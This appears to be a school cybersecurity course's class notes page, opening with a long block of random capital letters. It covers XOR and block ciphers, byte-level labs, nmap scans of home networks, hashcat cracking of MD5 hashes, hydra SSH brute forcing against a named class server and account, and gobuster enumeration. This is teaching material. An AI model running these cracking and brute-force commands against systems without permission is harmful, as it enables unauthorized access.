EHDIQWXVBBCMEZDPWBZPFLUYNXYMTMAYUJGXTALLSBSYMTOZVGTWEMFEVBCSWMLVGZGYKUGXJRZBWULSSGNSLZOBHWDTQRVPLZNMVQFZBNTCZGKQNQVFOYCMIXDIKOMPGFCSIDPBOIKPJRTGFGJMADSMZRZLRMAPWGOLHPNIUXCMJGTZRLGPCMOMLQEPPHZEKTUGJILPHUKCTHBTVXDFUVTCFNYEAZWHVRTIMXYBZMQHOAZIUMVGGCZLRGUPZOLLALDTJRLVFFOITQLEVNZFVVHUWQFDHVTGKBUBZMSDGHSTKBVVLPSESIKVPLVCFLQZIZGHVPHAGDWCVRGVUTULWFUPDGORUTYSFMKDSIKVPFVDWUWYHFIVLMPVAHWOKVTWKHUSWXLSWFHETDACJVWOHBZLVMLTWAUCSRTMKPHAKIXPFGNSLZOIKPWHSYROEXDMNMFLPNIOTTUJWZWGSNRMEZHSATGXSGXIRPHGLPWXWAOWKKFWXBJFHUNMJISIUMGQKBXOKHDMJMVGOFZEEWDPABWLPBBIKALOJQEJZNTHJVHXWBZTGUKXYHBOZBOTHUGWFKAWXDSRIRJMJMHALMLSWFCEJEVVVWFNVVKJTBAGGNSTFFZVZIVVWQLDSYLXYXAPAZVXCFZTFIBTGCKZTGNIGKVDAVUPGBLSTXHVAIZPHEOIUMVAICWPNRUYKLVUWKZTZQNSFWTMEWJJHUGXJAVCDLLPZYNMDPOMLPWCZBTHFGOIVIDHOLYFVXUYMQLPZVQIKAPAOMJPHUKVVTSESGKEVRYIMBZBSAGQFBZXZGNVAVWESRTXYVLVLCJJVBAWVLAPWQJDWQKWJAVZWLMAKVZLSTBTCAGQHVSFVKAPWQJHWAJSNLWILKZPRJOXYVHZVJGLFQGRUMOMAZJZCSYAZMOKGZJFUNZIUBYWFBZPWEIVRSFOSZVPBJGPCLZIYOAYUVTECEKQJMUEWBTWRGKBZMTZAOKHJBAMKEZPFRZLVISIKBWCRHYXJPPZDMVTBGNIRBYIFLLSSJOPCHDPWZTDHEGKXELLGDWCHUKLVTWAGNJFPORIRGKBZMHWOPKWNALZWBZPPBSFJAHLUTWLFRJECTYOWZHLHPNEEWAPWZWSOQYTINUOMXKZFQOHTHSWFQWDCSCSFWLVVEWWZVTKJEPSWKZTQXKRYHBAWATFHVZARLUWMAWSSPUYCWUWLZWXSZHIIGVBZQFRFRSEZGLLGNZTGPNMCWOWGLWIQRVXRLLZAMKZTOXMXAATABLLPYKELQVKUCJCWAMEXTPVKBFZPNIOXKVCFLSYRZUWKEFCFQFESYRMXBITW

go back to the top of the page

2026-03-03

2026-03-03T12:00:00+00:00

2026-03-03

For you c people: max plaintext size 12000

As long as orwell can be encoded or decoded you are good.

max key size

The max key size to check is 12

Test your encode/decode:

#!/bin/bash
#Change to any examples from class:
answer=THEANSWERISFORTYTWO
key=COMPLEX
cipher=VVQPYWTGFUHQSOVMFLZ
echo -n $answer > plain.txt
echo -n $key > key.txt
echo -n $cipher > cipher.txt
echo "Attempting to encode:"
make encode ARGS="plain.txt key.txt"
echo "Expected result:"
echo $cipher
echo ""
echo "Attempting to decode:"
make decode ARGS="cipher.txt key.txt"
echo "Expected result:"
echo $answer

This helps if you wanted to try different possibilities automatically:

#!/bin/bash
#Test with any of the examples from class:
answer=THEANSWERISFORTYTWO
key=COMPLEX
cipher=VVQPYWTGFUHQSOVMFLZ

echo -n $answer > plain.txt
echo -n $key > key.txt
echo -n $cipher > cipher.txt
echo "Attempting to encode:"
en=$(make encode ARGS="plain.txt key.txt")
if [[ $en == $cipher ]];then
        echo PASS
else
        echo FAIL $en vs $cipher
fi
echo "Attempting to decode:"
de=$(make decode ARGS="cipher.txt key.txt")
if [[ $de == $answer ]]; then
        echo PASS
else
        echo FAIL $de vs $answer
fi

Finally, try using bash script arguments $1, $2 etc.

#!/bin/bash
#INITIALIZE using CLI arguments
answer=$1
key=$2
cipher=$3

echo -n $answer > plain.txt
echo -n $key > key.txt
echo -n $cipher > cipher.txt

en=$(make encode ARGS="plain.txt key.txt")
if [[ $en == $cipher ]];then
	echo PASS ENCODE
else
	echo FAIL decoded $en vs $cipher
fi
de=$(make decode ARGS="cipher.txt key.txt")
if [[ $de == $answer ]]; then
	echo PASS DECODE
else
	echo FAIL Decoded: $de vs $answer
fi

Now you can test both directions with a single line:

./test.sh THEANSWERISFORTYTWO COMPLEX VVQPYWTGFUHQSOVMFLZ
PASS ENCODE
PASS DECODE

go back to the top of the page

2026-03-03

2026-03-03T12:00:00+00:00

2026-03-03

Homework

Please complete the intro to TryHackMe assignment by Monday 8am.

Ongoing assignment: Create a How to document!

Place an md file in your classwork repo: HowToHack.md.

As you learn ways of accomplishing goals, take notes in the form of a "linux/hacking" cheatsheet would be a very good idea.

e.g.

How to transfer a file from the command line
How to find the ssh logs of a linux computer
How to display the hexadecimal dump of a file

The action of creating this document will help you learn how to do it better. You may NOT just use/copy someone else's document.

TryHackMe

All of you got an invite to TryHackMe at your stuy.edu addresses.

Please accept the invite and make sure you log in.

What is the point of TryHackMe?

TryHackMe is a great self directed learning tool. If you want to learn a lot fast, this can facilitate.

Reading the page and trying to understand it is the goal. If you just try to find the "correct answer" as fast as possible you will be missing a lot.

In the future your knowledge of these rooms will be challenged via practical activities.

Please update your HowToHack.md with any new skills and tools, along with a tl/dr set of instructions.

You have to do tryhackme rooms on time. They are not meant to be completed at a later date and will not be graded if that is the case.

Pre computer Cryptography

The best pre-computer ciphers are surprisingly effective.

The Enigma code was an important cipher historically and cryptographically speaking. You will learn about this in a homework assignment.

One time pad is an encryption technique that cannot be cracked, provided the single-use pre-shared key is larger than or equal to the size of the message being sent. This is equivalent to a vigenere with a key that is long enough for the entire message.

Digital Era Cryptography

Encryption Types:

Symmetric Encryption

TheSame key is used to encrypt and decrypt. (e.g. Password protected files)

Ceasar , Playfaire, Vigenere, and many other ciphers use the same key on both ends. The key must be exchanged ahead of time to allow the authorized parties to decrypt messages.

The most widely used digital cipher that use symmetric keys is AES (various number of bits). But there are others such as Blowfish/Twofish, RC4, RC5 ,DES.

Hash functions

A one way encryption (md5, sha, sha2, etc) that cannot be returned to the original form.

This is often used for authentication purposes

When you send data you can check if that data was transmitted correctly by also sending the hash of the data along with the data. If the hash value of the received data matches the hash that was sent then the data was sent correctly.

You can store hashes of passwords. You can still hash what a user types in to compare against the stored hash, but an attacker cannot see everyone's password.

Asymmetrical Encryption

Different keys are used to encrypt and decrypt. (public key cryptography)

Stream Ciphers

One bit or byte is encrypted at a time. This uses a random string of bits called the cipherstream which is combined with the plaintext using XOR.

The resulting ciphertext can be decrypted using the same cipherstream and XOR again. Stream ciphers must always use a different ciperstream for each message. The cipherstream can be a pseudorandom set of bits, in which case the random seed used can be the key. Alternatively, a truly random string of bits can be created and both the sender and receiver can keep a copy, they must then agree on which parts of that cipherstream to use on each message.

Plaintext	`...111010100111...`
Cipherstream [this is the key used to encode AND decode]	`...101011010110...`
Ciphertext	`...010001110001...`

The reason that stream ciphers must always use a different ciperstream for each message, is that an attacker can XOR the two ciphertexts together (see below). When the cipherstream is the same, and you XOR the two ciphertexts together the result is equivalent to the XOR of the two plaintexts. If the plaintexts are natural languages then the resulting stream can be analyzed to find the original messages.

XOR is commutative
the inverse of a XOR is XOR'ing by the same value
This result is very easy to decode using the same key and the ciphertext.

Terminology

confusion is the technique to ensure you do not give clues about the plain text in your ciphertext. This means we want the relationship between the ciphertext and the plaintext to be as complex as possible. Ceasar Cipher has poor confusion, while polyalphabetic cipers have better confusion, enigmacode has much better confusion.

diffusion is the spreading of the statistical structure of the plaintext over the bulk of the ciphertext. This is done by transposing or permuting the data. This occurs in hashing when a small change modifies the entire result.

Stream vs Block ciphers:

Stream ciphers are high speed, no diffusion, low hardware complexity so it is often implemented by some hardware. Each bit or byte is encrypted one at a time.

Block ciphers (tomorrow's notes) Software implementation lowers the speed, padding is added to make the messages a multiple of the block size. Each block is encrypted independently. Diffusion is possible within a block.

XOR

Since xor is commutative:

Let C1 = text1 xor Key

Let C2 = text2 xor Key

Now if we did C1 xor C2 it is the same as: text1 x Key x text2 x Key.

Since xor with the same thing twice cancels out, this is the same as text1 xor text2

This is weak because we may know part of the plain text, or key, or because we can perform frequency analysis.

2026-03-06

2026-03-06T12:00:00+00:00

2026-03-06

The Commutative Property of XOR and Key Cancellation

The XOR (Exclusive OR) operation is a fundamental bitwise operation in computer science and cryptography. It is denoted by the symbol ⊕ (or simply ^ in many programming languages).

1. Commutativity

XOR is commutative, meaning the order of the operands does not affect the result.

A \oplus B = B \oplus A

2. The Key Cancellation Property

(A ⊕ Key) ⊕ (B ⊕ Key) = A ⊕ B.

1. Start with expression: (A \oplus K) \oplus (B \oplus K) 2. Remove parentheses (Associativity): A \oplus K \oplus B \oplus K 3. Reorder terms (Commutativity): A \oplus B \oplus K \oplus K 4. Simplify K \oplus K: (Since any value XORed with itself is 0): A \oplus B \oplus 0 5. Identity Property: (Since any value XORed with 0 is itself): A \oplus B

Cybersecurity Consequences

This mathematical property has profound and dangerous implications in cryptography, specifically regarding Stream Ciphers and One-Time Pads.

The "Two-Time Pad" (Key Reuse) Attack

If an attacker intercepts two messages (C_1 and C_2) that have been encrypted with the same key ($K$), they can exploit the property we just proved to break the encryption.

The Attack:

The attacker computes C_1 ⊕ C_2:

C1 \oplus C2 = (A \oplus K) \oplus (B \oplus K) C1 \oplus C2 = A \oplus B \oplus K \oplus K C1 \oplus C2 = A \oplus B

The Result:

The attacker successfully removes the key completely and is left with A ⊕ B (Message A XORed with Message B). While this isn't the plain text immediately, it removes the mathematical protection of the key.

Using statistical analysis and known "cribs" (likely words or phrases), an attacker can separate A and B from the result of A ⊕ B. This allows them to recover both original plaintexts without ever knowing the Key.

Never Reuse Keys:

In XOR-based encryption systems (like One-Time Pads), the key must never be reused. Reuse allows the key to be cancelled out mathematically.

Block Ciphers:

In a block cipher, K bits are encrypted at a time. If the length of the data is greater than K, you will break the information into blocks of size K.

Electronic Codebook (ECB) - Use the same key on each block of data. This is parallelizable since each block does not depend on the others.

Patterns of the original data are visible because equal sections of plaintext will generate the same ciphertext as is evident when looking at images encrypted using this method:

Original:

Encrypted:

Cipher Block Chaining (CBC) / Output Feedback (OFB)

You propagate data from one block to the next to make equivalent blocks of plaintext into unequal blocks ciphertext. You start with an initialization vector on the first block, and then use data from the previously encrypted block (the specifics depend on CBC/OFB) in the current block's calculation.

Both the key and the initialization vector are required for both encryption and decryption.

The encryption must be done sequentially. (Cannot be multi threaded)

Errors in transmitted ciphertext affect the decryption of future ones. Output feedback OFB fixes this.

Patterns of the original data are no longer visible:

Original:

Encrypted:

Integer counter Mode (ICM) / Segmented Integer Counter Mode (SIC)

Counter mode: Instead of calculating the value to be used in the next block based on the prior block, a random number (Nonce) is used for the first block. That random value is then incremented by one for each subsequent block. This allows for parallelization and prevents errors in one block from affecting others.

Note: the key and the Nonce are required for both encryption and decryption

Programming languages are different

Reminder: you have to do tryhackme rooms on time.

Homework/Classwork: PRE-LAB Preparations

C:

Writing bytes directly in C is the default way to write to a file! This is super easy.

Java:

You can typecast an int to a byte! Then you can just write that to the file.

Since in previous years java people never had issues with this section, it is lower priority to give extra notes. I will add to this section only if needed. On Piazza: It is OK to ask for or answer how to write the java syntax for this low level operation.

Python

Opening files:

with open("inputFileName", 'rb') as f: #read bytes mode
    #code here

Opening two different files:

with open("inputFileName", 'rb') as infile, open("outputFileName", 'wb') as outfile:
      #code here

Python must open files in binary mode to write actual numbers. (mode is 'wb' to write bytes, or 'rb' to read bytes.)

In python use the to_bytes method to convert an int to a byte so it can be written in binary mode.


      i=10
      b = i.to_bytes(1, byteorder='little')
      f.write(b)

OR you can write your bytes using byte notation:


      f.write(b'\x0a') #write 10, note that this is Hexadecimal

To modify bytes you need to convert to another type like int:

b = b'\x0a'
  x = int.from_bytes(b,byteorder='little')
  #modify x here
  b = x.to_bytes(1, byteorder='little')
  #important: the first argument represents writing a 1 byte value

go back to the top of the page

2026-03-09

2026-03-09T12:00:00+00:00

2026-03-09

Tryhackme

In the future use the following link to see all assignments, when they are due, and if you completed them. https://tryhackme.com/assignments

Do Now:

sample bitwise xor:

c1 = 5  # Binary: 0101
c2 = 3  # Binary: 0011
c3 = c1 ^ c2  # 0101 ^ 0011 = 0110
print(c3)  # Output: 6

Calculate the binary representation of abYZ (hint 6162595a)

Now XOR the binary value with the binary of ZZZZ (5a5a5a5a)

What is the result in binary? in hex?

What happens if you try to convert this to ASCII?

Use tools carefully

This is a useful calculator: https://xor.pw/#

This calculator will pad values with leading zeroes. Your lab does NOT have this behavior.

If you were to xor "abYZ" with "a" , the website would treat "a" like the hex number 00000061, providing the leading zeroes. Hint: xor(v,0) is just v.

Lab03 Xor

Repo link: https://classroom.github.com/a/k3Dam9mf

URGENT: To simplify this lab, you can read/write one byte at a time, and not worry about little-endian writing in java/python.

By the end of the lab you should be comfortable with using bitwise operations and writing numbers directly to files.

You will be writing a program that can do the following:

Print the hex values of a file (file can be binary or text doesn't matter)
encode a text file into a binary ciphertext file (by xoring it with a plain text key).
decode a binary ciphertext into standard out (by xoring it with a plain text key).

makefile recipes:

make hexdump ARGS="filename"
make encode ARGS="inputTextfile keyfile outputCiphertextfile"
make decode ARGS="inputCiphertextfile keyfile"

1.1 hexdump

Your hexdump should be formatted like this: "41 42 61 62 0a 48 65 6c"

You can verify your hexdump by comparing to the xxd values! Your output should be the same as

xxd -p results.txt | sed 's/../& /g'

All bytes should be included, do not trim away leading zeroes.

1.2 and 1.3

Don't worry about the specifics of the encoding / decoding scheme right now.

As a preliminary encoding/decode you can do this:

encode will increment each byte by 1
decode will decrement each byte by 1

This is just for testing purposes. It makes you focus on getting the reading bytes part working.

You should verify if the ciphertext is correct using xxd (or your hexdump).

Note that 255 is the largest byte, so (255 wraps to 0)

make encode ARGS="textfile keyfile ciphertextfile"

In this recipe textfile is the input, ciphertextfile is the output file. It should not print anything. This is because we can't always print the ciphertext characters as you saw previously.

make decode ARGS="inputCiphertextfile keyfile"

In this recipe the output will be the decoded text.

1.4

Your encode/decode algorithm should apply a bitwise XOR. If the key is too short, repeat the key. If the key is too long, ignore the extra bits.

In java/c/python, the bitwise xor operator is just ^

You can use a calculator, however, you must make sure you manually duplicate the key to match the plaintext length.

https://xor.pw/#

The do now / overview in class is important for this, you should be able to verify if the ciphertext is correct using xxd.

go back to the top of the page

2026-03-10

2026-03-10T12:00:00+00:00

2026-03-10

Happy M A R 1 0 day!

History

In case you forgot, the history command can show you all of the commands you ran previously.

This can be used with grep to find how you did things.

Lab testing

"The most effective debugging tool is still careful thought, coupled with judiciously placed print statements" - Brian Kernighan, Unix for Beginners.

Test your assingments on wsl or a lab machine.

For your labs, your makefile must work on a clean clone ON THE LAB MACHINES.

Run the code using a test script that:

creates some test files
ONLY USES the make targets from the assignment.
In this case, Do not use make compile or make run This is project dependant.

#!/bin/bash
echo -n "sf" > key1 #-n means no newline added to the output of the echo
echo -n "aA" > plaintext1

echo "Expected output: '61 41'"
make hexdump ARGS="plaintext1"

echo "encode Expected output '12 27'"
make encode ARGS="plaintext1 key1 cipher1"
xxd -p cipher1 | sed 's/../& /g'

echo "hexdump Expected output '12 27'"
make hexdump ARGS="cipher1"

echo "Expected output: 'aA'"
make decode ARGS="cipher1 key1"

You can visually determine if the output is as expected.

Note how the echo command is dumping ONLY 2 bytes into the plaintext and key files because of the -n flag.

go back to the top of the page

2026-03-11

2026-03-11T12:00:00+00:00

2026-03-11

Tryhackme Networking + Homework Writeup

Deadline Monday, this should be done earlier, as other assignments will overlap.

You have been assigned a tryhackme module on networking and using a tool called nmap. You should only use nmap when you have permission to do so, as it consumes network resources when you use it.

You do NOT have permission to use it on the stuycs network, however you CAN test it at home!

Before you continue:

Everyone should have completed the perusall on legality of port scanning.

Nmap

Nmap is the short form for Network Mapper. It is an open-source Linux tool that is used to scan IP addresses / ports / applications. Nmap requires elevated privileges to run, but it allows network admins to find out the devices running on their network, discover open ports and services, and detect vulnerabilities.

You will learn to use nmap. Nmap is a networking tool that lets you probe remote hosts and see what ports are open.

This is the most technical TryHackMe room you have been assigned, please read the material carefully. The goal is not just "get all the questions", it is to learn how nmap can be used.

You don't need to memorize the flags, but do want to know what your options are.

Classwork/Homework: TryHackMe networking/nmap

The deadline for everything is Monday. Please communicate any issues to me earlier rather than later.

Part of the assignment MUST be completed at home.

This is a non-trivial homework, that requires you to run a scan for a while (5-10 minutes should be reasonable) in the background. If your scans do not complete in a reasonable timeframe check with piazza to make sure you are using the right methodology.

I.

Complete the TryHackMe module on networking/nmap

II.

Make sure you install nmap so you can scan things outside of tryHackme, like your home! You can sudo apt install nmap or download nmap to your personal device from the official site: https://nmap.org

III.

In your classwork repo, make a file repoFolder/04/nmap.txt

Scan your home network using nmap. The IP addresses you list will be internal so you don't have to worry too much about me getting them.

You can run multiple scans with different settings. Output your scans to files so you don't lose them!

Submit in your text file: the answers/explanations to 1-3 below.

For 1+2:

-list the command(s) you used and why you used them

-give the relevant output of your commands. (since your home IP's are NATed and I don't know your external IP there is no security issue)

1) Find all devices that are active on your home network. (You may wish to output the IP's into a file for the next step)

2) Find all open ports on the active devices.

3) Please react to the results of your scans. e.g. What are some things you discovered about your home network / What surprised you when scanning your home network / what did you realize about scanning etc.

If the scan is slow...

Try reducing the range of the scans. Nmap supports this through octet range addressing. Rather than specify a normal IP address, you can specify a comma-separated list of numbers or ranges for each octet.

For example, 192.168.0-255.1-254 will skip all addresses in the range that end in .0 or .255, and 192.168.3-5,7.1 will scan the four addresses 192.168.3.1, 192.168.4.1, 192.168.5.1, and 192.168.7.1.

Find your IP address on your home network, such as 192.168.1.145, now ONLY scan 192.168.1.*, that should work quickly enough.

You SHOULD be able to find every phone, computer, and smart device connected to your network. This includes your wifi and wired connections.

go back to the top of the page

2026-03-16

2026-03-16T12:00:00+00:00

2026-03-16

Quiz next week

Cryptography
Enigma machine
Passwords, Hashing, etc
Pre-computer ciphers from class vigenere/playfair/caesar

Home Network

NAT

Network Address Translation will allow you to use one IP address for multiple devices behind a router.

The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets:

10.0.0.0        -   10.255.255.255  (10/8 prefix)
172.16.0.0      -   172.31.255.255  (172.16/12 prefix)
192.168.0.0     -   192.168.255.255 (192.168/16 prefix)

IP addresses are unique to each device

IPv4

32 bit address gives us 4.3 x 10⁹ different addresses

The allowed number of addresses does not allow every device to have a unique address, they must be shared and masked.

Address is written in dotted decimal notation. e.g. 192.0.2.75

IPv6

128-bit address gives us 7.9 x 10²⁸ addresses.

This means that every device can have a unique address!

Address is written in hexadecimal separated by colons.

The address 2001:0db8:0001:0000:0000:0ab9:C0A8:0102 can be rewriten without leading zeros, and with 4 consecutive zeros eliminated:

2001:db8:1::ab9:C0A8:102

IPv6 dual

An IPv6 address combines an IPv6 and an IPv4 address and has the following format: y:y:y:y:y:y:x.x.x.x. The IPv6 portion of the address (indicated with y's) is always at the beginning, followed by the IPv4 portion (indicated with x's).

VPN

You can pay for a vpn to access the internet.

You can set up your own vpn to access your networks. Wireguard would be a viable tool for this, but there are many others.

I tend to use TailScale right now.

Tailscale is a zero-configuration mesh VPN that lets you securely connect your devices (laptops, servers, phones, and even smart home gadgets) into a single private network called a "tailnet". Unlike traditional VPNs that route all traffic through a central server, Tailscale creates direct, encrypted peer-to-peer connections between your devices using the WireGuard protocol.

The tool you use doesn't matter, as long as you research the right product for your needs.

Tailscale is free for up to 3 users and 100 devices. This is good enough free to learn about it.

Tailscale lets you set up with your google/microsoft/github account to authenticate. It requires minimum configuration. It allows you to use ANY device as an exit node (the node that accesses the internet). It also has all devices connect to eachother instead of through a central server.

Use cases for a VPN for your servers:

You have a firewall and want to have specific devices be able to access the computers behind it.
You have a home network and want to limit which devices can access services
You have a mobile device and want to be able to use public wifi, but use your home machine as the exit node.

CRITICAL:

Update and install important software

Make sure to update before you do new things: (including installing software)

sudo apt update && sudo apt upgrade

Install software you need

This is an example of what I mgiht do to a new system/VM I create:

sudo apt install git python3 gcc g++ make python3-pip zsh keychain

Optional

Everyone should probably learn to use keychain. Jump to the part where you automatically run the agent here: konstantinnovation.github.io/index.html#sshagent

Take some or all of the tips from here: https://github.com/konstantinnovation/customize

go back to the top of the page

2026-03-17

2026-03-17T12:00:00+00:00

2026-03-17

Hash cracking made EZ

You can use hashcat or john the ripper. Feel free to use the attack box if you cannot get hashcat/jtr working.

https://www.openwall.com/john/

https://hashcat.net/hashcat/

Please install hashcat on your personal devices. The attack box will work but will be much slower than a computer of your own, unless it is a potato pc.

Update:

If you are using windows+WSL, this is a good time to just use the windows binary. It will run natively with your windows drivers and work with far less configuration and issues.

Open any terminal in windows and you can run the same commands for hashcat. (The bash script example won't work however.)

hash cracking

You can do all of this in an attack box in any THM room. You just need to make sure you know how to copy/paste into the attack box!

Gitbash, and the school computers both seem to have md5sum installed so this should work. On gitbash there is an extra * in the output, but the tr command removes all the extra characters.

You MUST test your hashcat

Test on known hashes before trying to use it on real hashes!

(DO THIS ON YOUR PERSONAL DEVICE!)

Save the following into a file called makepasswords.sh, notice the first line has > not >>, this is to clear the file so you don't make duplicates by running it more than once.

echo -n "password" | md5sum | tr -d " *-" > target_hashes.txt
echo -n "PASSWORD" | md5sum | tr -d " *-" >> target_hashes.txt
echo -n "Password" | md5sum | tr -d " *-" >> target_hashes.txt
echo -n "P455w0rd" | md5sum | tr -d " *-" >> target_hashes.txt
echo -n "rockyou" | md5sum | tr -d " *-" >> target_hashes.txt
echo -n "S3CuReP455Word" | md5sum | tr -d " *-" >> target_hashes.txt
echo -n "GuessMe" | md5sum | tr -d " *-" >> target_hashes.txt

Don't forget to chmod your file

chmod +x makepasswords.sh

Now you can run the script to convert each password to a hash and append that to a file using the following command:

./makepasswords.sh

The resulting file target_hashes.txt should look like this:

5f4dcc3b5aa765d61d8327deb882cf99
319f4d26e3c536b5dd871bb2c52e3178
dc647eb65e6711e155375218212b3964
75b71aa6842e450f12aca00fdf54c51d
f806fc5a2a0d5ba2471600758452799c
b5af0b804ff7238bce48adef1e0c213f
031cbcccd3ba6bd4d1556330995b8d08

You can optionally add a few more passwords to test with but the file will be longer as a result.

Crack those hashes!

Before you start, make sure you have:

download and extract hashcat (only on your personal computer)
created the target_hashes.txt file (directions above),
open a terminal in your hashcat directory, or cd into your hashcat directory.
save your rockyou.txt in the hashcat directory to make your life easier.

hashcat modes

dictionary

The hashcat command for a dictionary attack is against md5 hashes is:

hashcat -m 0 -a 0 INPUT_FILE password_list

hashcat -m 0 -a 0 target_hashes.txt rockyou.txt

m is hash mode 0 is md5

a is the attack mode 0 is for dictionary

Mask attack

An alternative mode is mask basked brute force

hashcat -m 0 -a 3 --increment INPUT_FILE MASK_TO_USE

hashcat -m 0 -a 3 --increment --custom-charsetX CHARSET INPUT_FILE MASK_TO_USE

examples:

The next attack will help crack the GuessMe hash. Lets assume you knew it was a A capitalized word, with at least 4 lowercase to follow...

hashcat -m 0 -a 3 --increment INPUT_FILE --custom-charset1 "?u?l" "?u?l?l?l?l?1?1"

?u

is uppercase letters

?l

is lowercase letters

?a

is all characters

?1

is the custom charset 1

Masks are useful so you can take ANY known parts of the password style to reduce the search space. See here: https://hashcat.net/wiki/doku.php?id=frequently_asked_questions#why_should_i_use_a_mask_attack_i_just_want_to_brute_these_hashes

Identifying hash modes

You can find a list of hashcat hash examples here: https://hashcat.net/wiki/doku.php?id=example_hashes

This is an incredibly useful resource so you know what mode to attack something.

Try hack me

Start the hash cracking room in class, and finish at home.

Please use the KALI LINUX attack box (see the dropdown)

Hash cracking is due monday IN CASE of issues, but it should not take you that long. More work will be added tomorrow.

Running hashcat on your local machine is probably MUCH faster than using the attack box.

go back to the top of the page

2026-03-18

2026-03-18T12:00:00+00:00

2026-03-18

Regarding word lists

DO NOT install this in the lab. You have it in your cyber_resources already!

You need word lists aside from rockyou to use gobuster. You can find a good one by cloning the repo: https://github.com/danielmiessler/SecLists but if you want to save space, use the small version (read the readme for instructions)

Installing hydra on Ubuntu/WSL:

sudo apt update;
sudo apt install hydra

OPTIONAL (Only do this if the install says there are missing dependancies)

sudo apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev
sudo apt i nstall hydra

Regarding gobuster local install:

Please install go and gobuster so you have the same version as your tryhackme attack box.

If you don't have the latest version of gobuster the syntax "gobuster dir -w xxx -u yyy" will fail

If you used apt install gobuster , this is likely an old version. Please apt remove gobuster and try the following:

install go first: https://go.dev/doc/install
verify with go version #expected go1.22.x linux/amd64. If at least 1.2, then proceed.
install gobuster: go install github.com/OJ/gobuster/v3@latest
Put gobuster in your path: export PATH=$PATH:~/go/bin
Verify that worked: gobuster version #3.6 expected
If you cannot get the path to stay exported after you restart your terminal (wsl) then make an alias: alias gobuster=~/go/bin/gobuster
Finally, as an alternative if you would rather download the binary, there are download mirrors but you have to find them yourself. (I have one in your cyber_resources)

Homework/Classwork TryHackMe

You now have a Hydra and Gobuster tutorial added to your assignment queue. Both are Due Tuesday 8am.

Homework 05 Practical!

After completing the gobuster and hydra rooms, you have to submit these two tasks by Tuesday 8am.

Task 1

You will break into a machine using hydra.

Do NOT do this assignment from school, it will take a long time.

Use hydra from your home connection to break into the machine via SSH. Connect to 167.172.133.229 using the account haxor , but you have to guess the password with hydra. The password is in the rockyou list.

Note

The password is earlier in the rockyou list (< 700th) to allow for people to finish quickly.

It should take under 30 minutes to crack with hydra, but this is passive time, do it and come back later.

Task 2

You will find a flag on marge, I will give hints in class.

To get this flag, you must ssh onto marge. Run gobuster FROM marge, if you cd to your "cyber_resources" directory, just run ./gobuster

You can also run with the full path: ~/Documents/cyber_resources/gobuster

Or link a file from your ~/bin/ directory to that copy of gobuster. Then you can use the command gobuster

Actual Task:

Scan marge.stuy.edu/~konstans/ for files/directories.

SSH to marge. Use gobuster to marge.stuy.edu , DO NOT scan marge from any other computer.

Use various words lists from Seclists, the small ones should suffice.

When you find the first flag, there is a hint to find the second.

Submit:

You will be submitting a plain text file in your classwork repo directory REPONAME/05/hydra.txt

Please a header in your file:

Period, LastName, FirstName, flag_from_hydra{abc}, External_IP_FOR_HYDRA, flag1_from_marge{If_...}, flag2_from_marge{d1...}

I will check to see if your IP address tried to log in many times or not. DO NOT do this from school, it will not count.

External IP address you attacked from (try https://www.whatismyip.com/ ) on the device you used to crack the ssh login.

go back to the top of the page

2026-03-23

2026-03-23T12:00:00+00:00

2026-03-23

Vhosts

The web enumeration room skipped a topic: vhosts (virtual hosts).

I can run two web servers on the same machine: foo.marge.stuy.edu and bar.marge.stuy.edu

The web server will look at the URL and decide which web server to reply from. These would be virtual hosts on the same real host (marge.stuy.edu).

In gobuster, using the vhost mode: you can enumerate to find common vhosts, or if you know them you can enumerate directories/files on the different vhosts on the same machine.

Common vhosts such as: www, mail, blog, app, dev, webmail, web, etc.

Upcoming Unit:

Please make sure you are able to run Processing
Install processing on your personal devices. In the lab a terminal command processing will open a Processing IDE.
Make sure you can UNDERSTAND and manipulate the code and change images.

Processing Sample code:

This will open an image, and output a modified version in your processing window.

Play around with manipulating it differently.

Processing works with python/js

If you want to use processing python/js then you need to be able to do this in your respective languages. I will only be posting java based processing code.

Using this demo code, I would want everyone to be able to modify the image in a variety of ways.

Note: there is no (x,y) or (row,col), only pixels[index]. This can be converted to row column using the conversion:

row = index / width_of_image;

col = index % width_of_image;

Using that information you should be able to target pixels based on:

The row/col values
The color values

When you target a pixel, you should be able to modify the color in a variety of ways.

Change to greyscale
Change a particular r/g/b amount (remove all the red or enhance the blue)
Look at and alter the bits of an r/g/b/ value (change the last bit to a 0 of the red channel)

These are advanced concepts yuou would have learned last year, please review them ant test them with the code below.

      //for code that runs one time place all code in setup.
void setup(){
  size(800,600);
  PImage img = loadImage("cat.png");//this file must be in the data subdirectory of your processing sketch (project)
  println(img.width,img.height);//to check size of your images print this

  //load all the pixels into an array for easy access
  img.loadPixels();

  //loop over all of the pixels
  int numPixels = img.width * img.height;
  for (int i = 0; i < numPixels ; i++) {
    //get the color from the array
    color c = img.pixels[i];

    //extract r/g/b from c and change r/g/b somehow
    int red; // = ???;
    int green;// = ???;
    int blue; // = ???;

    //change img.pixels to reflect the new r/g/b

  }
  //save the changes you made in the array to the image
  img.updatePixels();

  //output the image
  image(img,0,0);
}

go back to the top of the page

2026-03-24

2026-03-24T12:00:00+00:00

2026-03-24

Tmux and PrivEsc Foundations

You are given a learning module with 3 rooms. Tmux should be done at home, since it is easier to figure out without help.

The Privilege Escalation room should be worked on in class.

The Comprehensive Linux PrivEsc room provides extra resources for you to try to learn about. It will require partial completion, more details will be given later.

Tmux Concepts

Using the shell can be powerful, but there are tools that make it more powerful!

Tmux is a tool that lets you split your terminal into multiple windows/panes and keep your excact terminal configuration after you disconnect from a server

Tmux specifics

Tmux has sessions, windows, and panes.

Tmux can have multiple sessions, a session can have multiple windows, a window can have multiple panes. On the server, users could follow certain conventions or rules to manage Tmux. For example, we could create a session for a specific project. In the project session, we could create multiple windows, and each window would be used for each specific task for the project. In the window, in order to finish the task more efficiently, we create multiple panes.

Think of session as a browser, each window is a browser tab, and each pane is a section of that browser tab.

Alternatively think of having 2 terminals taking up half the screen each, those terminals are each a pane, and the entire screen is a window.

Sessions are used to separate the tasks you are doing to help you orghanize and keep you from mixing up what you are trying to do.

Tmux interface

Tmux has its own terminal and can show you multiple terminals for the computer

We use hotkeys to issue commands directly to tmux so Tmux knows when to do things. All the hotkeys are prefixed by Ctrl + b.

Sessions

In the local terminal, we create Tmux sessions by simply running one of the following three equivalent commands.

    $ tmux
    $ tmux new
    $ tmux new-session

This will create a new session to the existing Tmux. If there is no previous Tmux session running, this will create the first Tmux session.

Detach Sessions

